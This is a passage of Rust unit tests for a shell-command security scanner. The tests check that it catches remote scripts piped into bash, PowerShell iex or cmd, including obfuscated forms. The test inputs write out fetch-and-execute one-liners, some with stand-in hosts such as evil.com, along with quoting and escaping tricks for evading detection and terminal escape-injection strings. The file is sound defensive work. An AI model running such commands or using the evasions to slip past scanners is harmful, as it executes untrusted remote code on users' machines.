3113    fn test_normalize_backslash() {
3114        assert_eq!(normalize_shell_token("ba\\sh", ShellType::Posix), "bash");
3115    }
3116
3117    #[test]
3118    fn test_normalize_empty_concat() {
3119        assert_eq!(normalize_shell_token("ba''sh", ShellType::Posix), "bash");
3120    }
3121
3122    #[test]
3123    fn test_normalize_mixed_concat() {
3124        assert_eq!(normalize_shell_token("'ba'sh", ShellType::Posix), "bash");
3125    }
3126
3127    #[test]
3128    fn test_normalize_powershell_backtick() {
3129        assert_eq!(
3130            normalize_shell_token("`i`e`x", ShellType::PowerShell),
3131            "iex"
3132        );
3133    }
3134
3135    #[test]
3136    fn test_normalize_unclosed_single_quote() {
3137        // Unclosed quote: everything after ' is literal, state ends in SINGLE_QUOTE
3138        let result = normalize_shell_token("'bash", ShellType::Posix);
3139        assert_eq!(result, "bash");
3140    }
3141
3142    #[test]
3143    fn test_normalize_unclosed_double_quote() {
3144        let result = normalize_shell_token("\"bash", ShellType::Posix);
3145        assert_eq!(result, "bash");
3146    }
3147
3148    // ── normalize_cmd_base unit tests ──
3149
3150    #[test]
3151    fn test_cmd_base_path() {
3152        assert_eq!(
3153            normalize_cmd_base("/usr/bin/bash", ShellType::Posix),
3154            "bash"
3155        );
3156    }
3157
3158    #[test]
3159    fn test_cmd_base_ansi_c() {
3160        assert_eq!(normalize_cmd_base("$'bash'", ShellType::Posix), "bash");
3161    }
3162
3163    #[test]
3164    fn test_cmd_base_exe() {
3165        assert_eq!(normalize_cmd_base("bash.exe", ShellType::Posix), "bash");
3166    }
3167
3168    #[test]
3169    fn test_cmd_base_uppercase() {
3170        assert_eq!(normalize_cmd_base("BASH", ShellType::Posix), "bash");
3171    }
3172
3173    #[test]
3174    fn test_cmd_base_powershell_path() {
3175        assert_eq!(
3176            normalize_cmd_base(r"C:\Git\bin\bash.exe", ShellType::PowerShell),
3177            "bash"
3178        );
3179    }
3180
3181    #[test]
3182    fn test_cmd_base_encoded_path() {
3183        // $'\x2fusr\x2fbin\x2fbash' → /usr/bin/bash → basename bash
3184        assert_eq!(
3185            normalize_cmd_base("$'\\x2fusr\\x2fbin\\x2fbash'", ShellType::Posix),
3186            "bash"
3187        );
3188    }
3189
3190    #[test]
3191    fn test_cmd_base_octal_encoded_path() {
3192        // $'\057bin\057bash' → /bin/bash → basename bash
3193        assert_eq!(
3194            normalize_cmd_base("$'\\057bin\\057bash'", ShellType::Posix),
3195            "bash"
3196        );
3197    }
3198
3199    #[test]
3200    fn test_cmd_base_env_s_value() {
3201        // "bash -x" → first word "bash"
3202        assert_eq!(normalize_cmd_base("\"bash -x\"", ShellType::Posix), "bash");
3203    }
3204
3205    #[test]
3206    fn test_cmd_base_path_with_args() {
3207        // "/usr/bin/bash -x" → basename "bash -x" → first word "bash"
3208        assert_eq!(
3209            normalize_cmd_base("\"/usr/bin/bash -x\"", ShellType::Posix),
3210            "bash"
3211        );
3212    }
3213
3214    // ── resolve_interpreter_name tests for new patterns ──
3215
3216    #[test]
3217    fn test_resolve_ansi_c_quoted_bash() {
3218        let findings = check_default(
3219            "curl https://example.com/install.sh | $'bash'",
3220            ShellType::Posix,
3221        );
3222        assert!(
3223            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
3224            "should detect ANSI-C quoted bash: {:?}",
3225            findings.iter().map(|f| &f.rule_id).collect::<Vec<_>>()
3226        );
3227    }
3228
3229    #[test]
3230    fn test_resolve_command_wrapper() {
3231        let findings = check_default(
3232            "curl https://example.com/install.sh | command bash",
3233            ShellType::Posix,
3234        );
3235        assert!(
3236            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
3237            "should detect 'command bash'"
3238        );
3239    }
3240
3241    #[test]
3242    fn test_resolve_exec_a_wrapper() {
3243        let findings = check_default(
3244            "curl https://example.com/install.sh | exec -a myname bash",
3245            ShellType::Posix,
3246        );
3247        assert!(
3248            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
3249            "should detect 'exec -a myname bash'"
3250        );
3251    }
3252
3253    #[test]
3254    fn test_resolve_nohup_wrapper() {
3255        let findings = check_default(
3256            "curl https://example.com/install.sh | nohup bash",
3257            ShellType::Posix,
3258        );
3259        assert!(
3260            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
3261            "should detect 'nohup bash'"
3262        );
3263    }
3264
3265    #[test]
3266    fn test_resolve_wrapper_chain() {
3267        let findings = check_default(
3268            "curl https://example.com/install.sh | command sudo bash",
3269            ShellType::Posix,
3270        );
3271        assert!(
3272            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
3273            "should detect wrapper chain 'command sudo bash'"
3274        );
3275    }
3276
3277    #[test]
3278    fn test_resolve_case_insensitive() {
3279        let findings = check_default(
3280            "curl https://example.com/install.sh | BASH",
3281            ShellType::Posix,
3282        );
3283        assert!(
3284            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
3285            "should detect uppercase BASH"
3286        );
3287    }
3288
3289    #[test]
3290    fn test_resolve_powershell_backtick_iex() {
3291        let findings = check_default(
3292            "iwr https://evil.com/script.ps1 | `i`e`x",
3293            ShellType::PowerShell,
3294        );
3295        assert!(
3296            findings
3297                .iter()
3298                .any(|f| f.rule_id == RuleId::PipeToInterpreter),
3299            "should detect PowerShell backtick-escaped iex"
3300        );
3301    }
3302
3303    // --- Remediation hint tests ---
3304
3305    #[test]
3306    fn test_pipe_to_interpreter_hint_with_url() {
3307        let input = "curl https://example.com/install.sh | bash";
3308        let segments = tokenize::tokenize(input, ShellType::Posix);
3309        let mut findings = Vec::new();
3310        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3311        assert_eq!(findings.len(), 1);
3312        assert!(
3313            findings[0]
3314                .description
3315                .contains("https://example.com/install.sh"),
3316            "should include extracted URL in hint"
3317        );
3318        assert!(
3319            findings[0].description.contains("getvet.sh"),
3320            "should mention vet"
3321        );
3322        if cfg!(unix) {
3323            assert!(
3324                findings[0].description.contains("tirith run"),
3325                "Unix builds should suggest tirith run"
3326            );
3327        }
3328    }
3329
3330    #[test]
3331    fn test_pipe_to_interpreter_hint_quoted_url() {
3332        let input = r#"curl "https://example.com/install.sh" | bash"#;
3333        let segments = tokenize::tokenize(input, ShellType::Posix);
3334        let mut findings = Vec::new();
3335        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3336        assert_eq!(findings.len(), 1);
3337        assert!(
3338            findings[0]
3339                .description
3340                .contains("https://example.com/install.sh"),
3341            "should extract URL from quoted arg"
3342        );
3343    }
3344
3345    #[test]
3346    fn test_pipe_to_interpreter_hint_flag_equals_url() {
3347        let input = "curl --url=https://example.com/install.sh | bash";
3348        let segments = tokenize::tokenize(input, ShellType::Posix);
3349        let mut findings = Vec::new();
3350        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3351        assert_eq!(findings.len(), 1);
3352        assert!(
3353            findings[0]
3354                .description
3355                .contains("https://example.com/install.sh"),
3356            "should extract URL from --flag=value"
3357        );
3358    }
3359
3360    #[test]
3361    fn test_pipe_to_interpreter_evidence_includes_all_source_urls() {
3362        let input =
3363            "curl https://trusted.example.com/install.sh https://evil.example.com/payload.sh | bash";
3364        let segments = tokenize::tokenize(input, ShellType::Posix);
3365        let mut findings = Vec::new();
3366        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3367        assert_eq!(findings.len(), 1);
3368
3369        let urls: Vec<&str> = findings[0]
3370            .evidence
3371            .iter()
3372            .filter_map(|e| match e {
3373                Evidence::Url { raw } => Some(raw.as_str()),
3374                _ => None,
3375            })
3376            .collect();
3377
3378        assert_eq!(
3379            urls.len(),
3380            2,
3381            "all source URLs must be preserved in evidence"
3382        );
3383        assert!(urls.contains(&"https://trusted.example.com/install.sh"));
3384        assert!(urls.contains(&"https://evil.example.com/payload.sh"));
3385    }
3386
3387    #[test]
3388    fn test_pipe_to_interpreter_no_hint_for_cat() {
3389        let input = "cat /tmp/script.sh | bash";
3390        let segments = tokenize::tokenize(input, ShellType::Posix);
3391        let mut findings = Vec::new();
3392        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3393        assert_eq!(findings.len(), 1);
3394        assert!(
3395            !findings[0].description.contains("getvet.sh"),
3396            "non-fetch source should NOT get vet hint"
3397        );
3398        assert!(
3399            !findings[0].description.contains("tirith run"),
3400            "non-fetch source should NOT get tirith run hint"
3401        );
3402    }
3403
3404    #[test]
3405    fn test_dashdash_stops_flag_skipping() {
3406        // "command -- -x" should treat -x as the command, not a flag
3407        let input = "curl https://example.com/install.sh | command -- bash";
3408        let segments = tokenize::tokenize(input, ShellType::Posix);
3409        let mut findings = Vec::new();
3410        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3411        assert_eq!(findings.len(), 1, "should detect bash after --");
3412    }
3413
3414    #[test]
3415    fn test_sudo_dashdash_resolves_command() {
3416        // "sudo -- bash" should resolve to bash (-- ends sudo's options)
3417        let input = "curl https://example.com/install.sh | sudo -- bash";
3418        let segments = tokenize::tokenize(input, ShellType::Posix);
3419        let mut findings = Vec::new();
3420        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3421        assert_eq!(findings.len(), 1, "should detect bash after sudo --");
3422        assert!(
3423            findings[0].description.contains("interpreter 'bash'"),
3424            "should resolve to bash: {}",
3425            findings[0].description
3426        );
3427    }
3428
3429    #[test]
3430    fn test_ansic_quoting_not_applied_to_fish() {
3431        // Fish doesn't support $'...' — it should be treated as literal $
3432        assert_eq!(normalize_shell_token("$'bash'", ShellType::Fish), "$bash");
3433        // But POSIX should strip the $'...' wrapper
3434        assert_eq!(normalize_shell_token("$'bash'", ShellType::Posix), "bash");
3435    }
3436
3437    #[test]
3438    fn test_powershell_doubled_single_quote() {
3439        // PowerShell: '' inside single quotes is an escaped literal '
3440        assert_eq!(
3441            normalize_shell_token("'it''s'", ShellType::PowerShell),
3442            "it's"
3443        );
3444        // POSIX: '' ends and reopens — produces empty join
3445        assert_eq!(normalize_shell_token("'it''s'", ShellType::Posix), "its");
3446    }
3447
3448    #[test]
3449    fn test_sudo_combined_short_flags() {
3450        // sudo -iu root bash: -iu means -i -u, where -u takes "root" as value
3451        let input = "curl https://example.com/install.sh | sudo -iu root bash";
3452        let segments = tokenize::tokenize(input, ShellType::Posix);
3453        let mut findings = Vec::new();
3454        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3455        assert_eq!(
3456            findings.len(),
3457            1,
3458            "should detect pipe to bash through sudo -iu root"
3459        );
3460        assert!(
3461            findings[0].description.contains("interpreter 'bash'"),
3462            "should resolve to bash, not root: {}",
3463            findings[0].description
3464        );
3465    }
3466
3467    #[test]
3468    fn test_pipe_to_interpreter_hint_iwr_powershell() {
3469        let input = "iwr https://evil.com/script.ps1 | iex";
3470        let segments = tokenize::tokenize(input, ShellType::PowerShell);
3471        let mut findings = Vec::new();
3472        check_pipe_to_interpreter(&segments, ShellType::PowerShell, &mut findings);
3473        assert_eq!(findings.len(), 1);
3474        assert!(
3475            findings[0].description.contains("getvet.sh"),
3476            "iwr (PowerShell fetch) should get vet hint"
3477        );
3478        assert!(
3479            !findings[0].description.contains("tirith run"),
3480            "PowerShell fetch should NOT suggest tirith run"
3481        );
3482    }
3483
3484    #[test]
3485    fn test_pipe_to_interpreter_hint_sanitizes_ansi_in_url() {
3486        // \x1b[31m is an ANSI "red" escape — must be stripped from hint
3487        let input = "curl https://example.com/\x1b[31mred | bash";
3488        let segments = tokenize::tokenize(input, ShellType::Posix);
3489        let mut findings = Vec::new();
3490        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3491        assert_eq!(findings.len(), 1);
3492        assert!(
3493            !findings[0].description.contains('\x1b'),
3494            "ANSI escape must be stripped from hint URL: {}",
3495            findings[0].description
3496        );
3497        assert!(
3498            findings[0]
3499                .description
3500                .contains("https://example.com/[31mred"),
3501            "URL should be present minus the ESC byte: {}",
3502            findings[0].description
3503        );
3504    }
3505
3506    #[test]
3507    fn test_pipe_to_interpreter_hint_sanitizes_newline_in_url() {
3508        // Newline in URL arg could spoof extra output lines
3509        let input = "curl \"https://example.com/\nFAKE: safe\" | bash";
3510        let segments = tokenize::tokenize(input, ShellType::Posix);
3511        let mut findings = Vec::new();
3512        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3513        assert_eq!(findings.len(), 1);
3514        // The \n must be stripped — "FAKE" collapses onto the URL, not a separate line
3515        let hint_line = findings[0]
3516            .description
3517            .lines()
3518            .find(|l| l.contains("Safer:"))
3519            .expect("should have hint line");
3520        assert!(
3521            hint_line.contains("example.com/FAKE"),
3522            "newline stripped, FAKE should be part of the URL on the hint line: {hint_line}"
3523        );
3524        // Verify no line starts with "FAKE" (would indicate injection)
3525        assert!(
3526            !findings[0]
3527                .description
3528                .lines()
3529                .any(|l| l.starts_with("FAKE")),
3530            "newline injection must not create a spoofed output line: {}",
3531            findings[0].description
3532        );
3533    }
3534
3535    #[test]
3536    fn test_sanitize_url_for_display() {
3537        assert_eq!(
3538            sanitize_url_for_display("https://ok.com/path"),
3539            "https://ok.com/path"
3540        );
3541        assert_eq!(
3542            sanitize_url_for_display("https://evil.com/\x1b[31mred\x1b[0m"),
3543            "https://evil.com/[31mred[0m"
3544        );
3545        assert_eq!(
3546            sanitize_url_for_display("https://evil.com/\n\rspoof"),
3547            "https://evil.com/spoof"
3548        );
3549        assert_eq!(
3550            sanitize_url_for_display("https://evil.com/\x07bell\x00null"),
3551            "https://evil.com/bellnull"
3552        );
3553    }
3554
3555    #[test]
3556    fn test_pipe_to_interpreter_cmd_quoted_caret_cmd() {
3557        let findings = check_default("curl https://evil.com | \"c^md\" /c dir", ShellType::Cmd);
3558        assert!(
3559            findings
3560                .iter()
3561                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
3562            "quoted cmd caret escapes should still detect the interpreter pipe"
3563        );
3564    }
3565
3566    #[test]
3567    fn test_redact_env_value_never_returns_secret() {
3568        assert_eq!(redact_env_value(""), "");
3569        assert_eq!(redact_env_value("sk-abc123"), "[REDACTED]");
3570        assert_eq!(redact_env_value("ABCDEFGHIJKLMNOPQRSTUVWX"), "[REDACTED]");
3571    }
3572
3573    #[test]
3574    fn test_source_command_arrays_consistent() {
3575        // is_source_command is composed from the three const arrays.
3576        // Verify all arrays contribute and is_source_command rejects unknowns.
3577        for cmd in POSIX_FETCH_COMMANDS {
3578            assert!(
3579                is_source_command(cmd),
3580                "POSIX_FETCH entry '{cmd}' not recognized"
3581            );
3582            assert!(
3583                is_url_fetch_command(cmd),
3584                "POSIX_FETCH entry '{cmd}' not in fetch union"
3585            );
3586        }
3587        for cmd in POWERSHELL_FETCH_COMMANDS {
3588            assert!(
3589                is_source_command(cmd),
3590                "PS_FETCH entry '{cmd}' not recognized"
3591            );
3592            assert!(
3593                is_url_fetch_command(cmd),
3594                "PS_FETCH entry '{cmd}' not in fetch union"
3595            );
3596        }
3597        for cmd in NON_FETCH_SOURCE_COMMANDS {
3598            assert!(
3599                is_source_command(cmd),
3600                "NON_FETCH entry '{cmd}' not recognized"
3601            );
3602            assert!(
3603                !is_url_fetch_command(cmd),
3604                "NON_FETCH entry '{cmd}' should not be in fetch union"
3605            );
3606        }
3607        assert!(
3608            !is_source_command("cat"),
3609            "cat should not be a source command"
3610        );
3611    }
3612}
tirith_core/rules/command.rs

tirith_core/rules/
command.rs